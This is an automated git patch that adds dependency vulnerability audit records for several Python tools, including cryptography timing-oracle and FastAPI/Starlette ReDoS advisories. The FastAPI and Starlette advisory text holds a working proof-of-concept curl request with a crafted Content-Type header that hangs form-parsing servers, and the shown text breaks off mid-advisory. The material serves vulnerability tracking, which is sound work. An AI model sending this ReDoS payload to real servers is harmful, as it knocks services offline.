From 1110a586c46a4e0e37af5cdcd95142475abe3681 Mon Sep 17 00:00:00 2001 From: "github.actions" Date: Tue, 6 Feb 2024 08:04:58 +0000 Subject: [PATCH] Latest data: Tue Feb 6 08:04:58 UTC 2024 --- audits/awscli-requirements.audit.json | 205 ++++++ audits/azure-cli-requirements.audit.json | 221 ++++++ audits/dnsviz-requirements.audit.json | 148 ++++ audits/dstack-requirements.audit.json | 524 +++++++++++++ audits/fdroidserver-requirements.audit.json | 123 +--- audits/flintrock-requirements.audit.json | 123 +--- audits/platformio-requirements.audit.json | 239 ++++++ audits/schemathesis-requirements.audit.json | 239 ++++++ audits/ssh-mitm-requirements.audit.json | 123 +--- audits/theharvester-requirements.audit.json | 769 +++++++++----------- requirements/awslogs-requirements.txt | 8 +- requirements/azure-cli-requirements.txt | 19 +- requirements/conda-lock-requirements.txt | 12 +- requirements/dolphie-requirements.txt | 4 +- requirements/dxpy-requirements.txt | 2 +- requirements/jupyterlab-requirements.txt | 3 + requirements/linode-cli-requirements.txt | 4 +- requirements/theharvester-requirements.txt | 28 +- requirements/vpn-slice-requirements.txt | 2 +- 19 files changed, 1999 insertions(+), 797 deletions(-) create mode 100644 audits/azure-cli-requirements.audit.json create mode 100644 audits/dnsviz-requirements.audit.json create mode 100644 audits/platformio-requirements.audit.json create mode 100644 audits/schemathesis-requirements.audit.json diff --git a/audits/awscli-requirements.audit.json b/audits/awscli-requirements.audit.json index 41b31899..079db625 100644 --- a/audits/awscli-requirements.audit.json +++ b/audits/awscli-requirements.audit.json 
@@ -9,6 +9,202 @@ "awscli-requirements" ], "vulnerabilities": [ + { + "modified": "2024-02-05T23:28:34Z", + "published": "2024-02-05T21:30:31Z", + "schema_version": "1.6.0", + "id": "GHSA-3ww4-gg4f-jr7f", + "aliases": [ + "CVE-2023-50782" + ], + "summary": "Python Cryptography package vulnerable to Bleichenbacher timing oracle attack", + "details": "A flaw was found in the python-cryptography package. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "cryptography", + "purl": "pkg:pypi/cryptography" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "42.0.0" + } + ] + } + ], + "versions": [ + "0.1", + "0.2", + "0.2.1", + "0.2.2", + "0.3", + "0.4", + "0.5", + "0.5.1", + "0.5.2", + "0.5.3", + "0.5.4", + "0.6", + "0.6.1", + "0.7", + "0.7.1", + "0.7.2", + "0.8", + "0.8.1", + "0.8.2", + "0.9", + "0.9.1", + "0.9.2", + "0.9.3", + "1.0", + "1.0.1", + "1.0.2", + "1.1", + "1.1.1", + "1.1.2", + "1.2", + "1.2.1", + "1.2.2", + "1.2.3", + "1.3", + "1.3.1", + "1.3.2", + "1.3.3", + "1.3.4", + "1.4", + "1.5", + "1.5.1", + "1.5.2", + "1.5.3", + "1.6", + "1.7", + "1.7.1", + "1.7.2", + "1.8", + "1.8.1", + "1.8.2", + "1.9", + "2.0", + "2.0.1", + "2.0.2", + "2.0.3", + "2.1", + "2.1.1", + "2.1.2", + "2.1.3", + "2.1.4", + "2.2", + "2.2.1", + "2.2.2", + "2.3", + "2.3.1", + "2.4", + "2.4.1", + "2.4.2", + "2.5", + "2.6", + "2.6.1", + "2.7", + "2.8", + "2.9", + "2.9.1", + "2.9.2", + "3.0", + "3.1", + "3.1.1", + "3.2", + "3.2.1", + "3.3", + "3.3.1", + "3.3.2", + "3.4", + "3.4.1", + "3.4.2", + "3.4.3", + "3.4.4", + "3.4.5", + "3.4.6", + "3.4.7", + "3.4.8", + "35.0.0", + "36.0.0", + "36.0.1", + "36.0.2", + "37.0.0", + "37.0.1", + "37.0.2", + "37.0.3", + "37.0.4", + "38.0.0", + "38.0.1", + "38.0.2", + "38.0.3", + "38.0.4", + "39.0.0", + "39.0.1", + 
"39.0.2", + "40.0.0", + "40.0.1", + "40.0.2", + "41.0.0", + "41.0.1", + "41.0.2", + "41.0.3", + "41.0.4", + "41.0.5", + "41.0.6", + "41.0.7" + ], + "database_specific": { + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-3ww4-gg4f-jr7f/GHSA-3ww4-gg4f-jr7f.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50782" + }, + { + "type": "WEB", + "url": "https://github.com/pyca/cryptography/issues/9785" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-50782" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254432" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pyca/cryptography" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-208" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T23:04:50Z", + "nvd_published_at": "2024-02-05T21:15:11Z", + "severity": "MODERATE" + } + }, { "modified": "2023-11-09T05:40:01Z", "published": "2023-07-14T21:31:08Z", @@ -304,6 +500,15 @@ } ], "groups": [ + { + "ids": [ + "GHSA-3ww4-gg4f-jr7f" + ], + "aliases": [ + "CVE-2023-50782", + "GHSA-3ww4-gg4f-jr7f" + ] + }, { "ids": [ "GHSA-cf7p-gm2m-833m", diff --git a/audits/azure-cli-requirements.audit.json b/audits/azure-cli-requirements.audit.json new file mode 100644 index 00000000..09366026 --- /dev/null +++ b/audits/azure-cli-requirements.audit.json 
@@ -0,0 +1,221 @@ +[ + { + "package": { + "name": "cryptography", + "version": "41.0.6", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "azure-cli-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-05T23:28:34Z", + "published": "2024-02-05T21:30:31Z", + "schema_version": "1.6.0", + "id": "GHSA-3ww4-gg4f-jr7f", + "aliases": [ + "CVE-2023-50782" + ], + "summary": "Python Cryptography package vulnerable to Bleichenbacher timing oracle attack", + "details": "A flaw was found in the python-cryptography package. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "cryptography", + "purl": "pkg:pypi/cryptography" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "42.0.0" + } + ] + } + ], + "versions": [ + "0.1", + "0.2", + "0.2.1", + "0.2.2", + "0.3", + "0.4", + "0.5", + "0.5.1", + "0.5.2", + "0.5.3", + "0.5.4", + "0.6", + "0.6.1", + "0.7", + "0.7.1", + "0.7.2", + "0.8", + "0.8.1", + "0.8.2", + "0.9", + "0.9.1", + "0.9.2", + "0.9.3", + "1.0", + "1.0.1", + "1.0.2", + "1.1", + "1.1.1", + "1.1.2", + "1.2", + "1.2.1", + "1.2.2", + "1.2.3", + "1.3", + "1.3.1", + "1.3.2", + "1.3.3", + "1.3.4", + "1.4", + "1.5", + "1.5.1", + "1.5.2", + "1.5.3", + "1.6", + "1.7", + "1.7.1", + "1.7.2", + "1.8", + "1.8.1", + "1.8.2", + "1.9", + "2.0", + "2.0.1", + "2.0.2", + "2.0.3", + "2.1", + "2.1.1", + "2.1.2", + "2.1.3", + "2.1.4", + "2.2", + "2.2.1", + "2.2.2", + "2.3", + "2.3.1", + "2.4", + "2.4.1", + "2.4.2", + "2.5", + "2.6", + "2.6.1", + "2.7", + "2.8", + "2.9", + "2.9.1", + "2.9.2", + "3.0", + "3.1", + "3.1.1", + "3.2", + "3.2.1", + "3.3", + "3.3.1", + "3.3.2", + "3.4", + "3.4.1", + "3.4.2", + "3.4.3", + "3.4.4", + "3.4.5", + "3.4.6", + "3.4.7", + "3.4.8", + "35.0.0", + "36.0.0", + "36.0.1", + "36.0.2", + "37.0.0", + 
"37.0.1", + "37.0.2", + "37.0.3", + "37.0.4", + "38.0.0", + "38.0.1", + "38.0.2", + "38.0.3", + "38.0.4", + "39.0.0", + "39.0.1", + "39.0.2", + "40.0.0", + "40.0.1", + "40.0.2", + "41.0.0", + "41.0.1", + "41.0.2", + "41.0.3", + "41.0.4", + "41.0.5", + "41.0.6", + "41.0.7" + ], + "database_specific": { + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-3ww4-gg4f-jr7f/GHSA-3ww4-gg4f-jr7f.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50782" + }, + { + "type": "WEB", + "url": "https://github.com/pyca/cryptography/issues/9785" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-50782" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254432" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pyca/cryptography" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-208" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T23:04:50Z", + "nvd_published_at": "2024-02-05T21:15:11Z", + "severity": "MODERATE" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-3ww4-gg4f-jr7f" + ], + "aliases": [ + "CVE-2023-50782", + "GHSA-3ww4-gg4f-jr7f" + ] + } + ] + } +] \ No newline at end of file diff --git a/audits/dnsviz-requirements.audit.json b/audits/dnsviz-requirements.audit.json new file mode 100644 index 00000000..817bb206 --- /dev/null +++ b/audits/dnsviz-requirements.audit.json 
@@ -0,0 +1,148 @@ +[ + { + "package": { + "name": "m2crypto", + "version": "0.39.0", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "dnsviz-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-05T22:56:53Z", + "published": "2024-02-05T21:30:31Z", + "schema_version": "1.6.0", + "id": "GHSA-944j-8ch6-rf6x", + "aliases": [ + "CVE-2023-50781" + ], + "summary": "m2crypto Bleichenbacher timing attack - incomplete fix for CVE-2020-25657", + "details": "A flaw was found in m2crypto. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "m2crypto", + "purl": "pkg:pypi/m2crypto" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.40.1" + } + ] + } + ], + "versions": [ + "0.11", + "0.13", + "0.15", + "0.16", + "0.17", + "0.18", + "0.18.1", + "0.18.2", + "0.19", + "0.19.1", + "0.20", + "0.20.1", + "0.20.2", + "0.20beta1", + "0.21", + "0.21.1", + "0.22.3", + "0.22.4", + "0.22.5", + "0.23.0", + "0.24.0", + "0.25.0", + "0.25.1", + "0.26.0", + "0.26.2", + "0.26.3", + "0.26.4", + "0.27.0", + "0.28.0", + "0.28.1", + "0.28.2", + "0.29.0", + "0.30.0", + "0.30.1", + "0.31.0", + "0.32.0", + "0.33.0", + "0.34.0", + "0.35.0", + "0.35.1", + "0.35.2", + "0.36.0", + "0.37.0", + "0.37.1", + "0.38.0", + "0.39.0", + "0.40.0", + "0.40.1" + ], + "database_specific": { + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-944j-8ch6-rf6x/GHSA-944j-8ch6-rf6x.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50781" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-50781" + }, 
+ { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254426" + }, + { + "type": "PACKAGE", + "url": "https://gitlab.com/m2crypto/m2crypto" + }, + { + "type": "WEB", + "url": "https://gitlab.com/m2crypto/m2crypto/-/issues/342" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-208" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T22:41:57Z", + "nvd_published_at": "2024-02-05T21:15:10Z", + "severity": "MODERATE" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-944j-8ch6-rf6x" + ], + "aliases": [ + "CVE-2023-50781", + "GHSA-944j-8ch6-rf6x" + ] + } + ] + } +] \ No newline at end of file diff --git a/audits/dstack-requirements.audit.json b/audits/dstack-requirements.audit.json index 9242217c..1b91643a 100644 --- a/audits/dstack-requirements.audit.json +++ b/audits/dstack-requirements.audit.json 
@@ -1,4 +1,291 @@ [ + { + "package": { + "name": "fastapi", + "version": "0.109.0", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "dstack-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-05T17:28:33Z", + "published": "2024-02-05T17:01:54Z", + "schema_version": "1.6.0", + "id": "GHSA-qf9m-vfgh-m389", + "aliases": [ + "CVE-2024-24762" + ], + "summary": "FastAPI Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\nThis 
is also reported to Starlette at: https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\n\n### PoC\n\nCreate a FastAPI app that uses form data:\n\n```Python\n# main.py\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 
4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM ttys010 0:00.00 grep uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument 
and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "fastapi", + "purl": "pkg:pypi/fastapi" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.109.1" + } + ] + } + ], + "versions": [ + "0.1.0", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.18", + "0.1.19", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.10.0", + "0.10.1", + "0.10.2", + "0.100.0", + "0.100.0b1", + "0.100.0b2", + "0.100.0b3", + "0.100.1", + "0.101.0", + "0.101.1", + "0.102.0", + "0.103.0", + "0.103.1", + "0.103.2", + "0.104.0", + "0.104.1", + "0.105.0", + "0.106.0", + "0.107.0", + "0.108.0", + "0.109.0", + "0.11.0", + "0.12.0", + "0.12.1", + "0.13.0", + "0.14.0", + "0.15.0", + "0.16.0", + "0.17.0", + "0.18.0", + "0.19.0", + "0.2.0", + "0.2.1", + "0.20.0", + "0.20.1", + "0.21.0", + "0.22.0", + "0.23.0", + "0.24.0", + "0.25.0", + "0.26.0", + "0.27.0", + "0.27.1", + "0.27.2", + "0.28.0", + "0.29.0", + "0.29.1", + "0.3.0", + "0.30.0", + "0.30.1", + "0.31.0", + "0.32.0", + "0.33.0", + "0.34.0", + "0.35.0", + "0.36.0", + "0.37.0", + "0.38.0", + "0.38.1", + "0.39.0", + "0.4.0", + "0.40.0", + "0.41.0", + "0.42.0", + "0.43.0", + "0.44.0", + "0.44.1", + "0.45.0", + "0.46.0", + "0.47.0", + "0.47.1", + "0.48.0", + "0.49.0", + "0.49.1", + "0.49.2", + "0.5.0", + "0.5.1", + "0.50.0", + "0.51.0", + "0.52.0", + "0.53.0", + "0.53.1", + "0.53.2", + "0.54.0", + "0.54.1", + "0.54.2", + "0.55.0", + "0.55.1", + "0.56.0", + "0.56.1", + "0.57.0", + "0.58.0", + "0.58.1", + "0.59.0", + "0.6.0", + "0.6.1", + "0.6.2", + "0.6.3", + "0.6.4", + "0.60.0", + "0.60.1", + "0.60.2", + "0.61.0", + "0.61.1", + "0.61.2", + "0.62.0", + "0.63.0", + "0.64.0", + "0.65.0", + "0.65.1", + "0.65.2", + "0.65.3", + "0.66.0", + "0.66.1", + "0.67.0", + "0.68.0", + "0.68.1", + "0.68.2", + "0.69.0", + "0.7.0", + "0.7.1", + "0.70.0", + "0.70.1", + "0.71.0", + "0.72.0", + "0.73.0", 
+ "0.74.0", + "0.74.1", + "0.75.0", + "0.75.1", + "0.75.2", + "0.76.0", + "0.77.0", + "0.77.1", + "0.78.0", + "0.79.0", + "0.79.1", + "0.8.0", + "0.80.0", + "0.81.0", + "0.82.0", + "0.83.0", + "0.84.0", + "0.85.0", + "0.85.1", + "0.85.2", + "0.86.0", + "0.87.0", + "0.88.0", + "0.89.0", + "0.89.1", + "0.9.0", + "0.9.1", + "0.90.0", + "0.90.1", + "0.91.0", + "0.92.0", + "0.93.0", + "0.94.0", + "0.94.1", + "0.95.0", + "0.95.1", + "0.95.2", + "0.96.0", + "0.96.1", + "0.97.0", + "0.98.0", + "0.99.0", + "0.99.1" + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.109.0", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-qf9m-vfgh-m389/GHSA-qf9m-vfgh-m389.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24762" + }, + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/tiangolo/fastapi" + }, + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T17:01:54Z", + "nvd_published_at": "2024-02-05T15:15:09Z", + "severity": "HIGH" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-qf9m-vfgh-m389" + ], + "aliases": [ + "CVE-2024-24762", + "GHSA-qf9m-vfgh-m389" + ] + } + ] + }, { "package": { "name": "git-url-parse", 
@@ -111,5 +398,242 @@ ] } ] + }, + { + "package": { + "name": "starlette", + "version": "0.35.1", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "dstack-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-05T17:18:11Z", + "published": "2024-02-05T17:01:19Z", + "schema_version": "1.6.0", + "id": "GHSA-93gm-qmq6-w238", + "summary": "Starlette Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a 
Starlette app that uses form data. To reproduce it it's not even necessary to create a Starlette app, just using the `Request` is enough:\n\n```Python\n# main.py\nfrom starlette.requests import Request\nfrom starlette.responses import JSONResponse\n\n\nasync def app(scope, receive, send):\n assert scope[\"type\"] == \"http\"\n request = Request(scope, receive)\n data = await request.form()\n response_data = {}\n for key in data:\n print(key, data.getlist(key))\n response_data[key] = data.getlist(key)\n response = JSONResponse(response_data)\n await response(scope, receive, send)\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running 